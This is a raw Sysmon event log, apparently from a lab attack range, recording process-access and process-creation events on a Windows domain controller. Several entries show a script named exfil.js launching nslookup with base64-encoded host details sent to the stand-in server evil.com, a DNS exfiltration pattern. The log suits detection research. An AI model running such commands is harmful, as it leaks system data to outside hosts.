14:21:52.922{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.922{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.922{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8C46-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.922{2E1864BB-1900-629A-8A46-000000005F02}58162692C:\Windows\system32\cmd.exe{2E1864BB-1900-629A-8C46-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.924{2E1864BB-1900-629A-8C46-000000005F02}7036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1900-629A-8A46-000000005F02}5816C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgz.tmp 2>&1 10341000x8000000000000000216099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.885{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-8B46-000000005F02}4060C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.885{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-8B46-000000005F02}4060C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.869{2E1864BB-1900-629A-8B46-000000005F02}40604128C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8A46-000000005F02}5816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.853{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8B46-000000005F02}4060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.838{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.838{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8A46-000000005F02}5816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.838{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.838{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.838{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.838{2E1864BB-18E0-629A-6742-000000005F02}39764280C:\Windows\System32\WScript.exe{2E1864BB-1900-629A-8A46-000000005F02}5816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.849{2E1864BB-1900-629A-8A46-000000005F02}5816C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.838{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluwwfq.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.822{2E1864BB-1900-629A-8846-000000005F02}57486072C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8946-000000005F02}5596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.806{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.806{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.806{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.806{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.806{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8946-000000005F02}5596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.806{2E1864BB-1900-629A-8746-000000005F02}2164004C:\Windows\system32\cmd.exe{2E1864BB-1900-629A-8946-000000005F02}5596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.819{2E1864BB-1900-629A-8946-000000005F02}5596C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1900-629A-8746-000000005F02}216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluwwfq.tmp 2>&1 10341000x8000000000000000216079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.800{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-8846-000000005F02}5748C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.785{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-8846-000000005F02}5748C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.785{2E1864BB-1900-629A-8846-000000005F02}57486072C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8746-000000005F02}216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.769{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-8846-000000005F02}5748C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.753{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.753{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.753{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 